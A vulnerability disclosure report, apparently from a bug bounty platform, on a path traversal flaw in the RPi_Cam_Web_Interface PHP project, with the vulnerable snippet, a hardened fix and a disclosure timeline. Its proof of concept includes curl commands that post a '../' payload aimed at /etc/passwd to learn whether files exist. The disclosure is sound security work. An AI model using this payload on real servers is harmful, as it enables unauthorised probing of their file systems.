Path Traversal in silvanmelchior/RPi_Cam_Web_Interface in silvanmelchior/rpi_cam_web_interface

Valid

Reported on

Feb 18th 2022


Description

A path traversal attack (also known as directory traversal or dot-dot-slash) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration and critical system files.
https://github.com/silvanmelchior/RPi_Cam_Web_Interface is vulnerable to Path Traversal as shown below:

The vulnerability allows an attacker to determine which files exist on the filesystem, even outside the web server directory.

Proof of concept

Vuln variable: $_POST['extrastyle']
Snippet:

   if (isset($_POST['extrastyle'])) {
      // The POST value is concatenated into the path unchanged, so "../"
      // sequences escape css/ and file_exists() answers for any path on disk.
      if (file_exists('css/' . $_POST['extrastyle'])) {
         $fp = fopen(BASE_DIR . '/css/extrastyle.txt', "w");
         fwrite($fp, $_POST['extrastyle']);   // raw value persisted and later served
         fclose($fp);
      }
   }

Payload

In a terminal, send a request to the vulnerable resource (in this case index.php in the web root directory) with a path traversal payload in the extrastyle variable:

curl http://localhost/index.php --data "extrastyle=../../../../../../../../etc/passwd"

If the file exists on the server, the filename is stored in css/extrastyle.txt.
In a terminal, request that file and observe that /etc/passwd has been written:

curl http://localhost/css/extrastyle.txt

Impact

An attacker may manipulate a URL in such a way that the web site executes or reveals the contents of arbitrary files anywhere on the web server.
In this case, the path traversal vulnerability allows an attacker to enumerate which files exist on the server.
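The same handler in a hardened form, as an added example that is neither the project's code nor the fix merged in 2c74da; it assumes BASE_DIR is defined as in index.php and that selectable stylesheets are plain files directly under css/:

```php
<?php
// Added example, not the project's code or its merged fix: a hardened
// version of the extrastyle handler from the proof of concept above.
// Assumes BASE_DIR is defined as in index.php.

function store_extrastyle(string $requested): bool
{
    $cssDir = realpath(BASE_DIR . '/css');
    if ($cssDir === false) {
        return false;
    }

    // 1. Accept only a bare filename of the expected shape. This rejects
    //    "../", absolute paths, NUL bytes and anything outside the
    //    allow-list before the filesystem is touched at all.
    if (!preg_match('/^[A-Za-z0-9_-]+\.css$/', $requested)) {
        return false;
    }

    // 2. Resolve the candidate and confirm it is still inside css/.
    //    realpath() returns false for non-existent files and collapses
    //    symlinks, so a symlink pointing elsewhere is caught as well.
    $resolved = realpath($cssDir . DIRECTORY_SEPARATOR . $requested);
    if ($resolved === false
        || strpos($resolved, $cssDir . DIRECTORY_SEPARATOR) !== 0
        || !is_file($resolved)) {
        return false;
    }

    // 3. Persist only the validated basename, never the raw POST value.
    return file_put_contents($cssDir . '/extrastyle.txt',
                             basename($resolved), LOCK_EX) !== false;
}

if (isset($_POST['extrastyle'])) {
    $ok = is_string($_POST['extrastyle'])
        && store_extrastyle($_POST['extrastyle']);
    if (!$ok) {
        // One response for "rejected" and "no such file", so the handler
        // cannot serve as a file-existence oracle for paths outside css/.
        http_response_code(400);
    }
}
```

The allow-list check alone already closes the traversal; the realpath() prefix check is kept as defence in depth should the pattern ever be loosened.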

References

https://owasp.org/www-community/attacks/Path_Traversal
https://portswigger.net/web-security/file-path-traversal

We are processing your report and will contact the silvanmelchior/rpi_cam_web_interface team within 24 hours. 3 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the silvanmelchior/rpi_cam_web_interface team and are waiting to hear back 3 months ago
silvanmelchior validated this vulnerability 3 months ago
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
silvanmelchior confirmed that a fix has been merged on 2c74da 3 months ago
The fix bounty has been dropped
index.php#L209-L213 has been validated